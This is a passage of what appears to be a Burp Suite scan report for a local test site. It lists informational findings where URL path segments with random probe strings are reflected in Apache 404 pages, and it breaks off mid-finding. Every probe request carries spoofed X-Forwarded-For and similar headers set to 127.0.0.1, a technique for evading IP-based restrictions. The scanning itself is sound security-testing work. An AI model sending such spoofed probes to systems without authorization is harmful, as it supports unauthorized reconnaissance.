Date: Thu, 18 Oct 2018 21:06:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteod2pbgax2a/docs/examplewebiste_v1.3.pdf was not found on this server.</p>
...[SNIP]...
19.43. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/examplewebiste_v1.3.pdf

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsunps8rmomf/examplewebiste_v1.3.pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsunps8rmomf/examplewebiste_v1.3.pdf was not found on this server.</p>
...[SNIP]...
19.44. http://localhost/examplewebiste/docs/pdf [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/pdfg8mqwwdpwn HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/pdfg8mqwwdpwn was not found on this server.</p>
...[SNIP]...
19.45. http://localhost/examplewebiste/docs/pdf [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistesenpnwb9eg/docs/pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistesenpnwb9eg/docs/pdf was not found on this server.</p>
...[SNIP]...
19.46. http://localhost/examplewebiste/docs/pdf [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsblgcx7riv0/pdf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsblgcx7riv0/pdf was not found on this server.</p>
...[SNIP]...
19.47. http://localhost/examplewebiste/docs/pdf.html [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/docs/pdf.html7etupnxwj0 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docs/pdf.html7etupnxwj0 was not found on this server.</p>
...[SNIP]...
19.48. http://localhost/examplewebiste/docs/pdf.html [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteq257cauak5/docs/pdf.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteq257cauak5/docs/pdf.html was not found on this server.</p>
...[SNIP]...
19.49. http://localhost/examplewebiste/docs/pdf.html [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/docs/pdf.html

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/docsc6zpfllnu3/pdf.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/docsc6zpfllnu3/pdf.html was not found on this server.</p>
...[SNIP]...
19.50. http://localhost/examplewebiste/examplewebiste [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste2vee6kjoii HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste2vee6kjoii was not found on this server.</p>
...[SNIP]...
19.51. http://localhost/examplewebiste/examplewebiste [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste3flk8o2fg5/examplewebiste HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste3flk8o2fg5/examplewebiste was not found on this server.</p>
...[SNIP]...
19.52. http://localhost/examplewebiste/examplewebiste/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisterd9vqosnei/examplewebiste/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisterd9vqosnei/examplewebiste/ was not found on this server.</p>
...[SNIP]...
19.53. http://localhost/examplewebiste/examplewebiste/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistee6w52dj40g/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistee6w52dj40g/ was not found on this server.</p>
...[SNIP]...
19.54. http://localhost/examplewebiste/examplewebiste/css [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/cssa4e3bi5qwv HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/cssa4e3bi5qwv was not found on this server.</p>
...[SNIP]...
19.55. http://localhost/examplewebiste/examplewebiste/css [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistejhou34yypr/examplewebiste/css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistejhou34yypr/examplewebiste/css was not found on this server.</p>
...[SNIP]...
19.56. http://localhost/examplewebiste/examplewebiste/css [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteds3sy4w932/css HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteds3sy4w932/css was not found on this server.</p>
...[SNIP]...
19.57. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteoedmb7ynjd/examplewebiste/css/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteoedmb7ynjd/examplewebiste/css/ was not found on this server.</p>
...[SNIP]...
19.58. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteyooie6cexy/css/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteyooie6cexy/css/ was not found on this server.</p>
...[SNIP]...
19.59. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/css/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/css0ldxokxx42/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/css0ldxokxx42/ was not found on this server.</p>
...[SNIP]...
19.60. http://localhost/examplewebiste/examplewebiste/images [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/imagesnvn8201vtm HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/imagesnvn8201vtm was not found on this server.</p>
...[SNIP]...
19.61. http://localhost/examplewebiste/examplewebiste/images [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste7swbv6mtt3/examplewebiste/images HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste7swbv6mtt3/examplewebiste/images was not found on this server.</p>
...[SNIP]...
19.62. http://localhost/examplewebiste/examplewebiste/images [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteafr64t5b7d/images HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteafr64t5b7d/images was not found on this server.</p>
...[SNIP]...
19.63. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteqz1ry3i1k7/examplewebiste/images/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteqz1ry3i1k7/examplewebiste/images/ was not found on this server.</p>
...[SNIP]...
19.64. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteq1nmo7f8nj/images/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteq1nmo7f8nj/images/ was not found on this server.</p>
...[SNIP]...
19.65. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/images/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/images8gqjaytmc1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/images8gqjaytmc1/ was not found on this server.</p>
...[SNIP]...
19.66. http://localhost/examplewebiste/examplewebiste/includes [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includespbuz6082qc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 311
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includespbuz6082qc was not found on this server.</p>
...[SNIP]...
19.67. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistezyl8ejmlgb/examplewebiste/includes HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
